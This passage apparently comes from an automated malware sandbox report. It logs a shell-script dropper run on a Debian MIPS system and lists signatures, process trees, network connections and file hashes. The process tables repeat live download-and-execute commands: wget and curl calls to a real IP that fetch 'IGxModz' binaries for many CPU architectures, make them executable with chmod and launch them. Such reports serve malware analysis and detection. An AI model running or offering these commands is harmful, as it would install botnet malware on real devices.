| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /tmp/3AvA | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/IGxModz.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3AvA | /tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh | N/A |
| File opened for modification | /tmp/IGxModz.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.x86 | /usr/bin/curl | N/A |
Processes
/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.x86]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.x86]
/bin/cat
[cat IGxModz.x86]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]
/tmp/3AvA
[./3AvA x86]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.mips]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.mips]
/bin/cat
[cat IGxModz.mips]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]
/tmp/3AvA
[./3AvA mips]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.mpsl]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.mpsl]
/bin/cat
[cat IGxModz.mpsl]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]
/tmp/3AvA
[./3AvA mpsl]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm4]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm4]
/bin/cat
[cat IGxModz.arm4]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]
/tmp/3AvA
[./3AvA arm4]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm5]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm5]
/bin/cat
[cat IGxModz.arm5]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]
/tmp/3AvA
[./3AvA arm5]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm6]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm6]
/bin/cat
[cat IGxModz.arm6]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]
/tmp/3AvA
[./3AvA arm6]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm7]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm7]
/bin/cat
[cat IGxModz.arm7]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]
/tmp/3AvA
[./3AvA arm7]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.ppc]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.ppc]
/bin/cat
[cat IGxModz.ppc]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]
/tmp/3AvA
[./3AvA ppc]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.m68k]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.m68k]
/bin/cat
[cat IGxModz.m68k]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]
/tmp/3AvA
[./3AvA m68k]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.sh4]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.sh4]
/bin/cat
[cat IGxModz.sh4]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]
/tmp/3AvA
[./3AvA sh4]
Network
| Country | Destination | Domain | Proto |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
Files
/tmp/IGxModz.x86
| MD5 | 960b4fa9d5383373f0a1ea04929df01b |
| SHA1 | f78054d817db7742162a706b5d9f1fedcdf21140 |
| SHA256 | 3e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a |
| SHA512 | 2d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-21 08:50
Reported
2024-11-21 08:54
Platform
debian9-mipsel-20240418-en
Max time kernel
28s
Max time network
29s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /tmp/3AvA | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/3AvA | /tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh | N/A |
| File opened for modification | /tmp/IGxModz.arm4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.m68k | /usr/bin/curl | N/A |
Processes
/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.x86]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.x86]
/bin/cat
[cat IGxModz.x86]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]
/tmp/3AvA
[./3AvA x86]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.mips]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.mips]
/bin/cat
[cat IGxModz.mips]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]
/tmp/3AvA
[./3AvA mips]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.mpsl]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.mpsl]
/bin/cat
[cat IGxModz.mpsl]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]
/tmp/3AvA
[./3AvA mpsl]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm4]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm4]
/bin/cat
[cat IGxModz.arm4]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]
/tmp/3AvA
[./3AvA arm4]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm5]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm5]
/bin/cat
[cat IGxModz.arm5]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]
/tmp/3AvA
[./3AvA arm5]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm6]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm6]
/bin/cat
[cat IGxModz.arm6]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]
/tmp/3AvA
[./3AvA arm6]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm7]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm7]
/bin/cat
[cat IGxModz.arm7]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]
/tmp/3AvA
[./3AvA arm7]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.ppc]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.ppc]
/bin/cat
[cat IGxModz.ppc]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]
/tmp/3AvA
[./3AvA ppc]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.m68k]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.m68k]
/bin/cat
[cat IGxModz.m68k]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]
/tmp/3AvA
[./3AvA m68k]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.sh4]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.sh4]
/bin/cat
[cat IGxModz.sh4]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]
/tmp/3AvA
[./3AvA sh4]
Network
| Country | Destination | Domain | Proto |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
Files
/tmp/IGxModz.x86
| MD5 | 960b4fa9d5383373f0a1ea04929df01b |
| SHA1 | f78054d817db7742162a706b5d9f1fedcdf21140 |
| SHA256 | 3e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a |
| SHA512 | 2d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f |